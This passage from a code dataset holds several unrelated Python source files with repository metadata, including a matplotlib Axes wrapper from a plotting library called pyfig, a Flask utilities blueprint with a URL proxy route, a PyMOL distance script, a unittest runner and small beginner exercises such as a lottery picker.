u'依赖建筑', u'依赖建筑等级', u'依赖联盟等级', u'效果ID', u'参数1', u'参数2', u'参数3')\n Table.__init__(self, cur, wb)\n","repo_name":"miwoow/UsefulTools","sub_path":"src/qixiong/tables/guildtecheffect.py","file_name":"guildtecheffect.py","file_ext":"py","file_size_in_byte":594,"program_lang":"python","lang":"fa","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"74085326187","text":"'''This program takes an integer and reverses the digits of that integer\n'''\n\ndef main(n):\n ans = n[::-1]\n print(\"The no. you entered : \", int(n))\n print(\"The reverse of the no. is : \", ans)\n\n\nif __name__ == '__main__':\n n = int(input(\"Enter the no. of integers you want to reverse : \"))\n for i in range(n):\n no = input(\"Enter an integer : \")\n main(no)\n","repo_name":"amitmakhija/python","sub_path":"reverseinteger.py","file_name":"reverseinteger.py","file_ext":"py","file_size_in_byte":376,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"29910522393","text":"from pathlib import Path\n\nCURRENT_PATH = Path(__file__)\n\nARCHIVO_CSV_PATH = CURRENT_PATH.parent.parent.joinpath(\n \"project\").joinpath(\"assets\").joinpath(\"test.csv\")\n\n\nclass Person():\n def __init__(self, name, last_name, age, ci, work):\n self.name = name\n self.last_name = last_name\n self.age = age\n self.ci = ci\n self.work = work\n\n\n# Print a blank line\nprint(\"\\n\")\nfile_csv = open(ARCHIVO_CSV_PATH, \"r\", encoding=\"utf8\")\nlines_in_file = file_csv.readlines()\nfile_csv.close()\n\n\ndef from_line_to_person(line):\n values = line.split(',')\n return Person(values[0], values[1], int(values[2]), values[3], values[4])\n\n\npersons = list(map(from_line_to_person, lines_in_file[1:]))\n\nprint(\"Personas inscritas\", len(persons))\nprint(\"Personas mayores 30:\", len(\n list(filter(lambda person: person.age >= 30, persons))))\n","repo_name":"cruzortiz99/python-course","sub_path":"cap_7/read_csv.py","file_name":"read_csv.py","file_ext":"py","file_size_in_byte":856,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"30974767249","text":"\"\"\"\nProgram entry point\n\"\"\"\n\nimport unittest\nfrom BeautifulReport import BeautifulReport\n\n\ndef suite():\n \"\"\"\n Define the test suite and load the test cases\n :return:\n \"\"\"\n suite = unittest.TestSuite()\n tests = unittest.TestLoader().discover(start_dir='./testcases', pattern=\"test*.py\")\n suite.addTests(tests)\n return suite\n\n\nif __name__ == '__main__':\n \"\"\"\n Run the test suite and generate the test report\n \"\"\"\n suite = suite()\n result = BeautifulReport(suite)\n result.report(report_dir='./report', filename='cnode测试报告', description='test_conde')\n","repo_name":"panc-test/api-test-demo","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":582,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"34521672035","text":"import __main__\n__main__.pymol_argv = [ 'pymol' ]\n\nimport sys, time, os\nimport pymol\n\npymol.finish_launching()\n\nfrom pymol import cmd\n\ncmd.load(sys.argv[1])\npenalties = sys.argv[2]\nmax_num = int(sys.argv[3])\n\n#cmd.set(\"dash_width\", 4)\n\ncount = 0\nwith open(penalties, \"r\") as f:\n\tfor line in f.readlines()[:max_num]:\n\t\tsplit = line.split()\n\t\t\n\t\tname = split[0]+\"_\"+split[1]\n\t\tcmd.distance(name, \"id \"+split[0], \"id \"+split[1])\n\t\t\n\t\tif max_num <= 10:\n\t\t\tcmd.color(\"br\"+str(9-count), name)\n\t\t\n\t\tcount += 
1\n","repo_name":"ignatovmg/nmr","sub_path":"src/pymol_draw_dists.py","file_name":"pymol_draw_dists.py","file_ext":"py","file_size_in_byte":529,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"12428185490","text":"from __future__ import (division, unicode_literals, absolute_import,\n print_function)\n\nimport collections\nimport re\nimport sys # pylint: disable=W0611\nimport logging\nimport numbers\n\nimport numpy\nimport matplotlib.figure\nimport six\n\nfrom .exceptions import PyfigError\nfrom . import tools\n\nMARKERSIZE = {\n \"+\": 2,\n \"1\": 2,\n \"s\": 1,\n \"^\": 1.5,\n \"<\": 1.5,\n \"o\": 1.5,\n \"x\": 1.5,\n \"D\": 1,\n \">\": 1.5,\n \"*\": 2,\n \"\": 1}\nlogger = logging.getLogger(__name__)\n\n\nclass Axes(matplotlib.axes.Axes):\n \"\"\"Axes with some extra functions\"\"\"\n\n def __init__(self, fig, *args, **kwargs):\n self.fig = fig\n if \"row\" in kwargs and \"col\" in kwargs:\n self.row, self.col = self.fig.get_row_col(\n kwargs.pop(\"row\"), kwargs.pop(\"col\"))\n args = (self.get_axpos(),)\n elif \"ax1\" in kwargs:\n ax1 = kwargs.pop(\"ax1\")\n self.row = ax1.row\n self.col = ax1.col\n args = (self.get_axpos(),)\n # args = (ax1.get_axpos(),)\n ax1.parent = self\n else:\n self.row = None\n self.col = None\n self.horizontal = False\n self.parent = None\n self.ylim_manual = None\n self.xlim_manual = None\n matplotlib.axes.Axes.__init__(self, fig, *args, **kwargs)\n\n self.min_row, self.max_row = (\n self.row if isinstance(self.row, tuple) else\n (self.row, self.row))\n self.min_col, self.max_col = (\n self.col if isinstance(self.col, tuple) else\n (self.col, self.col))\n\n self.ncol = 1\n self.loc = \"upper right\"\n self.xaxis.tick_bottom()\n\n def plot(self, *args, **kwargs):\n return self._plot1(\"plot\", *args, **kwargs)\n\n def axvspan(self, *args, **kwargs):\n return self._plot2(\"axvspan\", *args, **kwargs)\n\n def fill(self, *args, **kwargs):\n return self._plot1(\"fill\", *args, **kwargs)\n\n def axhline(self, *args, **kwargs):\n \"\"\"ax.axhline function\"\"\"\n label, leg_place = self._get_label(kwargs)\n self._update_mix(kwargs, label, leg_place)\n self._update_color(kwargs)\n result = self.switch_horizontal(\n matplotlib.axes.Axes.axvline,\n matplotlib.axes.Axes.axhline,\n *args, **kwargs)\n if label:\n self.fig.add_line(result, label, leg_place)\n return result\n\n def axvline(self, *args, **kwargs):\n \"\"\"ax.axvline function\"\"\"\n label, leg_place = self._get_label(kwargs)\n self._update_mix(kwargs, label, leg_place)\n self._update_color(kwargs)\n result = self.switch_horizontal(\n matplotlib.axes.Axes.axhline,\n matplotlib.axes.Axes.axvline,\n *args, **kwargs)\n if label:\n self.fig.add_line(result, label, leg_place)\n return result\n\n def get_axpos(self):\n \"\"\"Determine the ax position\"\"\"\n return self.fig.get_axpos(self.row, self.col)\n\n def _plot1(self, ax_func, *args, **kwargs):\n \"\"\"ax.ax_function, result[0] in legend\"\"\"\n label, leg_place = self._get_label(kwargs)\n self._update_mix(kwargs, label, leg_place)\n self._update_color(kwargs)\n result = getattr(matplotlib.axes.Axes, ax_func)(self, *args, **kwargs)\n if label:\n self.fig.add_line(result[0], label, leg_place)\n return result\n\n def _plot2(self, ax_func, *args, **kwargs):\n \"\"\"ax.ax_function, result in legend\"\"\"\n label, leg_place = self._get_label(kwargs)\n self._update_mix(kwargs, label, leg_place)\n self._update_color(kwargs)\n result = getattr(matplotlib.axes.Axes, ax_func)(self, *args, **kwargs)\n if 
label:\n self.fig.add_line(result, label, leg_place)\n return result\n\n def pie(self, *args, **kwargs):\n \"\"\"ax.pie function\"\"\"\n\n if \"radius\" in kwargs and matplotlib.__version__ < \"1.2.1\":\n # older version of matplotlib do not have radius for pie\n del kwargs[\"radius\"]\n if \"colors\" in kwargs and \"legends\" in kwargs:\n colors = []\n for color, legend in zip(kwargs[\"colors\"], kwargs[\"legends\"]):\n new_kwargs = {\"color\": color}\n self._update_mix(new_kwargs, legend, \"fig\")\n self._update_color(new_kwargs)\n colors.append(new_kwargs[\"color\"])\n kwargs[\"colors\"] = colors\n\n legends = kwargs.pop(\"legends\", None)\n\n if \"autopct\" in kwargs and kwargs[\"autopct\"] == \"values\":\n def autopct(pct):\n \"\"\"Define the autopct function to display the total\"\"\"\n total = sum(args[0])\n val = int(round(pct * total / 100))\n return \"{0}\".format(val)\n # return '{p:.2f}% ({v:d})'.format(p=pct,v=val)\n kwargs[\"autopct\"] = autopct\n\n result = matplotlib.axes.Axes.pie(self, *args, **kwargs)\n if legends:\n for line, legend in zip(result[0], legends):\n self.fig.add_line(line, legend)\n return result\n\n def bar(self, left, height, *args, **kwargs):\n \"\"\"ax.bar function\"\"\"\n label, leg_place = self._get_label(kwargs)\n self._update_mix(kwargs, label, leg_place)\n self._update_color(kwargs)\n if \"hatch\" in kwargs and isinstance(kwargs[\"hatch\"], list):\n hatches = kwargs[\"hatch\"]\n kwargs[\"hatch\"] = \"\"\n else:\n hatches = None\n\n if self.horizontal:\n bottom = kwargs.pop(\"bottom\", None)\n width = kwargs.pop(\"width\", 0.8)\n self.horizontal = False\n result = matplotlib.axes.Axes.bar(\n self, left=bottom,\n height=width, width=height, bottom=left,\n orientation=\"horizontal\", **kwargs)\n self.horizontal = True\n else:\n result = matplotlib.axes.Axes.bar(\n self, left, height, *args, **kwargs)\n if label and len(result) > 0:\n self.fig.add_line(result[0], label, leg_place)\n\n if hatches:\n for hatch, mybar in zip(hatches, result):\n mybar.set_hatch(hatch)\n return result\n\n def errorbar(self, xcoord, ycoord, *args, **kwargs):\n \"\"\"ax.errorbar function\"\"\"\n label, leg_place = self._get_label(kwargs)\n self._update_mix(kwargs, label, leg_place)\n self._update_color(kwargs)\n\n if kwargs.get(\"fmt\") == \"none\" and matplotlib.__version__ < \"1.4\":\n kwargs[\"fmt\"] = None\n\n if self.horizontal:\n self.horizontal = False\n yerr = kwargs.pop(\"yerr\", None)\n result = matplotlib.axes.Axes.errorbar(\n self, ycoord, xcoord, xerr=yerr, **kwargs)\n self.horizontal = True\n else:\n result = matplotlib.axes.Axes.errorbar(\n self, xcoord, ycoord, *args, **kwargs)\n if label:\n self.fig.add_line(result[0], label, leg_place)\n return result\n\n def text(self, x, y, text, **kwargs):\n \"\"\"ax.text function\"\"\"\n text, kwargs = self.fig.latex(text, kwargs)\n label, leg_place = self._get_label(kwargs)\n self._update_mix(kwargs, label, leg_place)\n self._update_color(kwargs)\n return matplotlib.axes.Axes.text(self, x, y, text, **kwargs)\n\n def set_ylabel(self, text, **kwargs):\n \"\"\"Add some latex tricks\"\"\"\n text, kwargs = self.fig.latex(text, kwargs)\n if self.horizontal:\n self.horizontal = False\n result = matplotlib.axes.Axes.set_xlabel(\n self.parent if self.parent is not None else self,\n text, **kwargs)\n self.horizontal = True\n else:\n result = matplotlib.axes.Axes.set_ylabel(self, text, **kwargs)\n return result\n\n def set_xlabel(self, text, **kwargs):\n \"\"\"set xlabel with latex tricks\"\"\"\n text, kwargs = self.fig.latex(text, 
kwargs)\n if self.horizontal:\n self.horizontal = False\n result = matplotlib.axes.Axes.set_ylabel(self, text, **kwargs)\n self.horizontal = True\n else:\n result = matplotlib.axes.Axes.set_xlabel(\n self.parent if self.parent is not None else self,\n text, **kwargs)\n return result\n\n @staticmethod\n def _get_label(kwargs):\n \"\"\"Get the label, and remove it\"\"\"\n label = kwargs.pop(\"label\", None)\n if label == \"_nolegend_\":\n label = None\n leg_place = kwargs.pop(\"leg_place\", \"fig\")\n return label, leg_place\n\n def _update_color(self, kwargs):\n \"\"\"Update colors and markersize\"\"\"\n\n for elem in (key for key in list(kwargs.keys())\n if key.endswith(\"color\")):\n if isinstance(kwargs[elem], list):\n for i, item in enumerate(kwargs[elem]):\n for key, value in self.parse_color(item).items():\n if elem[:-5] == \"\" or key == \"color\":\n kwargs[elem[:-5] + key][i] = value\n else:\n for key, value in self.parse_color(kwargs[elem]).items():\n if elem[:-5] == \"\" or key == \"color\":\n kwargs[elem[:-5] + key] = value\n\n if \"markersize\" in kwargs and \"marker\" in kwargs:\n if kwargs[\"marker\"] in MARKERSIZE:\n kwargs[\"markersize\"] *= MARKERSIZE[kwargs[\"marker\"]]\n else:\n logger.error(\"No markersize correction for %s\",\n repr(kwargs[\"marker\"]))\n\n def set_open(self):\n \"\"\"Set the ax to not have upper and right frame\"\"\"\n self.spines[\"top\"].set_color(\"none\")\n self.spines[\"right\"].set_color(\"none\")\n self.yaxis.set_ticks_position(\"left\")\n\n def set_ylim(self, *args, **kwargs):\n \"\"\"Set the xlimits (taking care of horizontal)\"\"\"\n if \"auto\" not in kwargs:\n self.ylim_manual = args\n return self.switch_horizontal(\n matplotlib.axes.Axes.set_xlim,\n matplotlib.axes.Axes.set_ylim,\n *args, **kwargs)\n\n def get_ylim(self, *args, **kwargs):\n \"\"\"Set the xlimits (taking care of horizontal)\"\"\"\n return self.switch_horizontal(\n matplotlib.axes.Axes.get_xlim,\n matplotlib.axes.Axes.get_ylim,\n *args, **kwargs)\n\n def get_xlabel(self, *args, **kwargs):\n \"\"\"get xlabel\"\"\"\n return self.switch_horizontal(\n matplotlib.axes.Axes.get_ylabel,\n matplotlib.axes.Axes.get_xlabel,\n *args, **kwargs)\n\n def get_ylabel(self, *args, **kwargs):\n \"\"\"set ylabel\"\"\"\n return self.switch_horizontal(\n matplotlib.axes.Axes.get_xlabel,\n matplotlib.axes.Axes.get_ylabel,\n *args, **kwargs)\n\n def set_xticks(self, *args, **kwargs):\n \"\"\"set xticks\"\"\"\n return self.switch_horizontal(\n matplotlib.axes.Axes.set_yticks,\n matplotlib.axes.Axes.set_xticks,\n *args, **kwargs)\n\n def set_yticks(self, *args, **kwargs):\n \"\"\"set yticks\"\"\"\n return self.switch_horizontal(\n matplotlib.axes.Axes.set_xticks,\n matplotlib.axes.Axes.set_yticks,\n *args, **kwargs)\n\n def set_xticklabels(self, labels, **kwargs):\n \"\"\"set xticklabels\"\"\"\n labels, kwargs = self.fig.latex(labels, kwargs)\n if self.horizontal:\n self.horizontal = False\n result = matplotlib.axes.Axes.set_yticklabels(\n self, labels, **kwargs)\n self.horizontal = True\n else:\n result = matplotlib.axes.Axes.set_xticklabels(\n self, labels, **kwargs)\n return result\n\n def set_yticklabels(self, labels, **kwargs):\n \"\"\"set yticklabels\"\"\"\n labels, kwargs = self.fig.latex(labels, kwargs)\n if self.horizontal:\n self.horizontal = False\n result = matplotlib.axes.Axes.set_xticklabels(\n self, labels, **kwargs)\n self.horizontal = True\n else:\n result = matplotlib.axes.Axes.set_yticklabels(\n self, labels, **kwargs)\n return result\n\n def get_xticks(self, *args, **kwargs):\n 
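 # Like the other thin wrappers in this class, the tick getters delegate
 # through switch_horizontal(), which temporarily clears self.horizontal
 # and calls the swapped x/y Axes method, so a "horizontal" axes
 # transparently exchanges its x and y APIs.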
\"\"\"get xticks\"\"\"\n return self.switch_horizontal(\n matplotlib.axes.Axes.get_yticks,\n matplotlib.axes.Axes.get_xticks,\n *args, **kwargs)\n\n def get_yticks(self, *args, **kwargs):\n \"\"\"get yticks\"\"\"\n return self.switch_horizontal(\n matplotlib.axes.Axes.get_xticks,\n matplotlib.axes.Axes.get_yticks,\n *args, **kwargs)\n\n def get_xticklines(self, *args, **kwargs):\n \"\"\"get xticklines\"\"\"\n return self.switch_horizontal(\n matplotlib.axes.Axes.get_yticklines,\n matplotlib.axes.Axes.get_xticklines,\n *args, **kwargs)\n\n def get_yticklines(self, *args, **kwargs):\n \"\"\"set yticklabels\"\"\"\n return self.switch_horizontal(\n matplotlib.axes.Axes.get_xticklines,\n matplotlib.axes.Axes.get_yticklines,\n *args, **kwargs)\n\n def get_xticklabels(self, *args, **kwargs):\n \"\"\"get xticklabels\"\"\"\n return self.switch_horizontal(\n matplotlib.axes.Axes.get_yticklabels,\n matplotlib.axes.Axes.get_xticklabels,\n *args, **kwargs)\n\n def get_yticklabels(self, *args, **kwargs):\n \"\"\"set yticklabels\"\"\"\n return self.switch_horizontal(\n matplotlib.axes.Axes.get_xticklabels,\n matplotlib.axes.Axes.get_yticklabels,\n *args, **kwargs)\n\n def switch_horizontal(self, func_horizontal, func, *args, **kwargs):\n \"\"\"Run function based on wheter horizontal is set\"\"\"\n if self.horizontal:\n self.horizontal = False\n result = func_horizontal(self, *args, **kwargs)\n self.horizontal = True\n else:\n result = func(self, *args, **kwargs)\n return result\n\n def set_xlim(self, *args, **kwargs):\n \"\"\"Set the xlimits (taking care of horizontal)\"\"\"\n if \"auto\" not in kwargs:\n self.xlim_manual = args\n return self.switch_horizontal(\n matplotlib.axes.Axes.set_ylim,\n matplotlib.axes.Axes.set_xlim,\n *args, **kwargs)\n\n def get_xlim(self, *args, **kwargs):\n \"\"\"Set the xlimits (taking care of horizontal)\"\"\"\n return self.switch_horizontal(\n matplotlib.axes.Axes.get_ylim,\n matplotlib.axes.Axes.get_xlim,\n *args, **kwargs)\n\n def set_xstyle(self, style):\n \"\"\"Set the style of x-axis for the date\"\"\"\n\n if style == \"month\":\n self.xaxis.set_major_formatter(\n matplotlib.dates.DateFormatter(\"%b\"))\n self.xaxis.set_major_locator(\n matplotlib.dates.MonthLocator())\n elif style in (\"month2\", \"month3\", \"month4\"):\n self.xaxis.set_major_formatter(\n matplotlib.dates.DateFormatter(\"%b\"))\n self.xaxis.set_major_locator(\n matplotlib.dates.MonthLocator(interval=int(style[-1])))\n elif style == \"year\":\n self.xaxis.set_major_formatter(\n matplotlib.dates.DateFormatter(\"%Y\"))\n self.xaxis.set_major_locator(\n matplotlib.dates.YearLocator())\n elif style == \"week\":\n self.xaxis.set_major_formatter(\n matplotlib.dates.DateFormatter(\"%W\"))\n self.xaxis.set_major_locator(\n matplotlib.dates.WeekdayLocator(\n byweekday=matplotlib.dates.SU, interval=2))\n\n def barplot(self, data, labels, colors, **kwargs):\n \"\"\"Bar plot\"\"\"\n\n options = {\"city_distance\": 0.2,\n \"house_distance\": 0.1,\n \"padding\": 0,\n \"leg_place\": \"fig\",\n \"alpha\": 1,\n \"capsize\": 2}\n options.update(kwargs)\n\n labels = collections.defaultdict(lambda: [None], labels)\n\n options[\"house_space\"] = ((1 - options[\"city_distance\"]) /\n len(labels[\"house\"]))\n options[\"house_width\"] = ((1 - options[\"house_distance\"]) *\n options[\"house_space\"])\n\n for house in range(len(labels[\"house\"])):\n yoff = numpy.zeros(len(labels[\"city\"]))\n for floor in range(len(labels[\"floor\"])):\n non_zeros = []\n bar_data = []\n indent = []\n for city in 
range(len(labels[\"city\"])):\n city_values = [\n (value, 0, 0) if isinstance(value, numbers.Number) else\n value\n for key, value in data.items()\n if (labels[\"city\"][city] in key or\n labels[\"city\"] == [None]) and\n (labels[\"house\"][house] in key or\n labels[\"house\"] == [None]) and\n (labels[\"floor\"][floor] in key or\n labels[\"floor\"] == [None])]\n if len(city_values) > 0:\n bar_data.append(numpy.sum(city_values, axis=0))\n non_zeros.append(city)\n else:\n bar_data.append([0, 0, 0])\n indent.append(\n city +\n 0.5 * (options[\"city_distance\"] +\n options[\"house_distance\"] *\n options[\"house_space\"]) +\n house * options[\"house_space\"])\n\n if len(bar_data) == 0:\n raise PyfigError(\"Empty barplot\")\n bar_data = numpy.array(bar_data)\n indent = numpy.array(indent)\n label, color = self._get_barcolor(labels, colors,\n house, floor)\n# ax.plot(\n# indent[non_zeros],\n# bar_data[non_zeros, 0],\n# linestyle=None,\n# color=black)\n if isinstance(color, list) and None in color:\n color = None\n if color is not None:\n self.bar(\n indent[non_zeros],\n bar_data[non_zeros, 0],\n width=options[\"house_width\"],\n color=color,\n label=label,\n bottom=yoff[non_zeros],\n leg_place=options[\"leg_place\"])\n if bar_data[:, 1:].sum() > 0:\n self.errorbar(\n indent[non_zeros] + 0.5 * options[\"house_width\"],\n bar_data[non_zeros, 0] + yoff[non_zeros],\n yerr=bar_data[non_zeros, 1:].transpose(),\n fmt=\"o\" if color is None else \"none\",\n ecolor=\"black\",\n color=\"black\",\n linewidth=0.6,\n capsize=options[\"capsize\"])\n yoff += bar_data[:, 0]\n\n self.set_xticks(numpy.arange(len(labels[\"city\"])) + 0.5)\n self.set_xticklabels([\"{0}\".format(label).replace(\"__\", \"\\n\")\n for label in labels[\"city\"]])\n self.set_xlim(0 - options[\"padding\"],\n len(labels[\"city\"]) + options[\"padding\"])\n for tick in self.get_xticklines():\n tick.set_markersize(0)\n\n def _get_barcolor(self, labels, colors, house, floor):\n \"\"\"Get the color of the bars\"\"\"\n\n if \"city\" in colors:\n color = colors[\"city\"][0:len(labels[\"city\"])]\n label = None\n\n elif (labels[\"house\"][house] is not None and\n labels[\"floor\"][floor] is not None):\n\n house_color = self.parse_color(colors[\"house\"][house])\n if \"hatch\" in house_color:\n hatchlabel = labels[\"house\"][house]\n hatch = house_color.pop(\"hatch\")\n color = house_color\n else:\n label = labels[\"house\"][house]\n\n floor_color = self.parse_color(colors[\"floor\"][floor])\n if \"hatch\" in floor_color:\n hatchlabel = labels[\"floor\"][floor]\n hatch = floor_color.pop(\"hatch\")\n color = floor_color\n else:\n label = labels[\"floor\"][floor]\n\n # Draw temporary bar for hatch legend\n logger.error(\"hatch=%s, hatchlabel=%s\", hatch, hatchlabel)\n# ax.bar(indent[non_zeros],\n# bar_data[non_zeros, 0],\n# options[\"house_width\"],\n# color=\"white\",\n# label=hatchlabel,\n# bottom=yoff[non_zeros],\n# hatch=hatch,\n# leg_place=\"fig2\")\n\n elif labels[\"house\"][house] is not None:\n color = colors[\"house\"][house]\n label = labels[\"house\"][house]\n elif labels[\"floor\"][floor] is not None:\n color = colors[\"floor\"][floor]\n label = labels[\"floor\"][floor]\n\n# elif \"house\" in colors and house < len(colors[\"house\"]):\n# # Empty house labels\n# color = colors[\"house\"][house]\n# elif \"floor\" in colors and floor < len(colors[\"floor\"]):\n# # Empty floor labels\n# color = colors[\"floor\"][floor]\n else:\n sys.exit(\"No house/floor available\")\n\n# if label and isinstance(label, six.string_types):\n# label = 
label.replace(\"__\", \"\\n\")\n\n if isinstance(color, list) and color[0] == \"mix\":\n color = \"mix\"\n\n return label, color\n\n @staticmethod\n def parse_color(color):\n \"\"\"Parse the color, return a dict with\n color, hatch (optional), and alpha (optional)\"\"\"\n\n cache = tools.Cache()\n result = {}\n\n if (isinstance(color, six.string_types) and\n cache(re.search(r\"-*h\\((.*?)\\)\", color))):\n color = color.replace(cache.output.group(), \"\")\n result[\"hatch\"] = cache.output.group(1)\n if (isinstance(color, six.string_types) and\n cache(re.search(r\"-*a\\((.*?)\\)\", color))):\n color = color.replace(cache.output.group(), \"\")\n result[\"alpha\"] = float(cache.output.group(1))\n if (isinstance(color, six.string_types) and\n cache(re.search(r\"-*s\\((.*?)\\)\", color))):\n color = color.replace(cache.output.group(), \"\")\n result[\"linestyle\"] = cache.output.group(1)\n if (isinstance(color, six.string_types) and\n cache(re.search(r\"-*m\\((.*?)\\)\", color))):\n color = color.replace(cache.output.group(), \"\")\n result[\"marker\"] = cache.output.group(1)\n\n if color == \"\":\n color = \"white\"\n\n if (isinstance(color, six.string_types) and\n cache(re.search(r\"hex\\((.*)\\)\", color))):\n color = cache.output.group(1)\n color = (int(color[0:2], 16) / 255,\n int(color[2:4], 16) / 255,\n int(color[4:6], 16) / 255)\n\n if isinstance(color, six.string_types):\n all_numbers = re.findall(r\"[\\.\\d]+\", color)\n if len(all_numbers) == 3:\n color = [float(number) for number in all_numbers]\n if max(color) > 1:\n color = [number / 255 for number in color]\n\n result[\"color\"] = color\n return result\n\n def __lt__(self, other):\n if isinstance(other, six.string_types):\n result = False\n else:\n result = (\n self.min_row < other.min_row or\n self.min_row == other.min_row and self.min_col < other.min_col)\n if self.fig.settings[\"abc_reverse\"]:\n result = not result\n return result\n\n def __gt__(self, other):\n return not self.__lt__(other)\n\n def _update_mix(self, kwargs, label, leg_place):\n \"\"\"Update the elements with color/line/.. 
= mix\"\"\"\n\n cache = tools.Cache()\n\n if leg_place not in self.fig.repo:\n self.fig.repo[leg_place] = list(self.fig.repo[\"all\"])\n style = self.fig.style[leg_place]\n repo = self.fig.repo[leg_place]\n\n for subcolor in (key for key in kwargs.keys()\n if key.endswith(\"color\")):\n if kwargs[subcolor] == \"mix\":\n elemlabel = label\n elif (isinstance(kwargs[subcolor], six.string_types) and\n cache(re.search(r\"mix\\((.*)\\)\", kwargs[subcolor]))):\n elemlabel = cache.output.group(1)\n else:\n continue\n\n if elemlabel in style:\n kwargs[subcolor] = style[elemlabel]\n # TODO: remove possible same color still in style\n# if style[elemlabel] in repo:\n# repo.remove(style[elemlabel])\n else:\n kwargs[subcolor] = repo[0] if len(repo) == 1 else repo.pop(0)\n style[elemlabel] = kwargs[subcolor]\n","repo_name":"Epispread/Pyfig","sub_path":"pyfig/ax.py","file_name":"ax.py","file_ext":"py","file_size_in_byte":25368,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"39719494411","text":"from flask import Blueprint, current_app, request, Response\nfrom flask_cors import cross_origin\nimport os\nimport requests\nfrom urllib.parse import unquote_plus, urlparse\n\nfrom ..db import DBClient\nfrom ..elastic import ElasticClient\nfrom ..utils import APIUtils\nfrom logger import createLog\n\nlogger = createLog(__name__)\n\n\nutils = Blueprint('utils', __name__, url_prefix='/utils')\n\n\n@utils.route('/languages', methods=['GET'])\ndef languageCounts():\n esClient = ElasticClient(current_app.config['REDIS_CLIENT'])\n\n reqParams = APIUtils.normalizeQueryParams(request.args)\n workCounts = reqParams.get('totals', ['true'])[0].lower() != 'false'\n\n langResult = esClient.languageQuery(workCounts)\n\n languageList = APIUtils.formatLanguages(\n langResult.aggregations, workCounts\n )\n\n logger.debug('Language list 200 OK on /utils/languages')\n\n return APIUtils.formatResponseObject(200, 'languageCounts', languageList)\n\n\n@utils.route('/counts', methods=['GET'])\ndef totalCounts():\n dbClient = DBClient(current_app.config['DB_CLIENT'])\n dbClient.createSession()\n\n totalResult = dbClient.fetchRowCounts()\n\n totalsSummary = APIUtils.formatTotals(totalResult)\n\n dbClient.closeSession()\n\n return APIUtils.formatResponseObject(200, 'totalCounts', totalsSummary)\n\n\n@utils.route('/proxy', methods=['GET', 'POST', 'PUT', 'HEAD', 'OPTIONS'])\n@cross_origin(origins=os.environ.get('API_PROXY_CORS_ALLOWED', '*'))\ndef getProxyResponse():\n proxyUrl = request.args.get('proxy_url')\n\n cleanUrl = unquote_plus(proxyUrl)\n\n urlParts = urlparse(cleanUrl)\n\n while True:\n headResp = requests.head(\n cleanUrl, headers={'User-agent': 'Mozilla/5.0'}\n )\n\n statusCode = headResp.status_code\n print(statusCode, cleanUrl)\n if statusCode in [200, 204]:\n break\n elif statusCode in [301, 302, 303, 307, 308]:\n print(headResp.headers)\n cleanUrl = headResp.headers['Location']\n\n if cleanUrl[0] == '/':\n cleanUrl = '{}://{}{}'.format(\n urlParts.scheme, urlParts.netloc, cleanUrl\n )\n else:\n logger.warn('Unable to proxy URL {}'.format(cleanUrl))\n cleanUrl = proxyUrl\n break\n\n\n resp = requests.request(\n method=request.method,\n url=cleanUrl,\n headers={k: v for (k, v) in request.headers if k != 'Host'},\n data=request.get_data(),\n cookies=request.cookies,\n allow_redirects=False\n )\n\n excludedHeaders = [\n 'content-encoding', 'content-length', 'transfer-encoding',\n 'x-frame-options', 'referrer-policy', 'access-control-allow-origin',\n 'connection', 
'keep-alive', 'public', 'proxy-authenticate',\n 'upgrade'\n ]\n\n headers = [\n (k, v) for (k, v) in resp.headers.items()\n if k.lower() not in excludedHeaders\n ]\n\n proxyResp = Response(resp.content, resp.status_code, headers)\n return proxyResp\n","repo_name":"NYPL/drb-etl-pipeline","sub_path":"api/blueprints/drbUtils.py","file_name":"drbUtils.py","file_ext":"py","file_size_in_byte":2994,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"37"} +{"seq_id":"72022393387","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Mar 6 13:01:14 2019\r\n\r\n@author: JL\r\n\"\"\"\r\nimport random\r\n\r\nclass lotto(object):\r\n \r\n def __init__(self,allnumber,chooseCount):\r\n self.allnumber=allnumber\r\n self.chooseCount=chooseCount\r\n \r\n def lottoChoose(self):\r\n chooseNumberLst=list()\r\n allnumberLst=list(range(1,self.allnumber+1))\r\n while True:\r\n chooseNumber=random.choice(allnumberLst)\r\n chooseNumberLst.append(chooseNumber)\r\n allnumberLst.remove(chooseNumber)\r\n if self.chooseCount==len(chooseNumberLst):\r\n break\r\n return chooseNumberLst\r\n \r\n def bubbleSorted(self,iterable):\r\n new_list = list(iterable)\r\n list_len = len(new_list)\r\n for i in range(list_len-1):\r\n for j in range(list_len-1,i,-1):\r\n if new_list[j] < new_list[j-1]:\r\n new_list[j],new_list[j-1] = new_list[j-1], new_list[j]\r\n return new_list\r\n \r\n def insertionSort(self,lst):\r\n for i in range(1, len(lst)):\r\n temp = lst[i]\r\n j = i - 1\r\n while j >= 0 and temp < lst[j]:\r\n lst[j + 1] = lst[j]\r\n j -= 1\r\n lst[j + 1] = temp\r\n return lst\r\n \r\nif __name__ == '__main__': \r\n allnumber=int(input(\"Enter the total count of lottery numbers: \"))\r\n chooseCount=int(input(\"Enter how many numbers to draw: \"))\r\n lottoCls=lotto(allnumber,chooseCount)\r\n lottoNumberLst=lottoCls.lottoChoose()\r\n lottoNumberSort=lottoCls.insertionSort(lst=lottoNumberLst)\r\n print(\"This draw's lottery numbers: %s\"%(lottoNumberSort))\r\n","repo_name":"build0220/Python-Basic","sub_path":"HomeWork/0305HW_JL.py","file_name":"0305HW_JL.py","file_ext":"py","file_size_in_byte":1659,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"32028181850","text":"import os,json\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport numpy as np\nfrom sklearn.metrics import f1_score,accuracy_score\n\n\nimport matplotlib\nmatplotlib.use(\"pgf\")\nmatplotlib.rcParams.update({\n \"pgf.texsystem\": \"pdflatex\",\n 'font.family': 'serif',\n 'text.usetex': 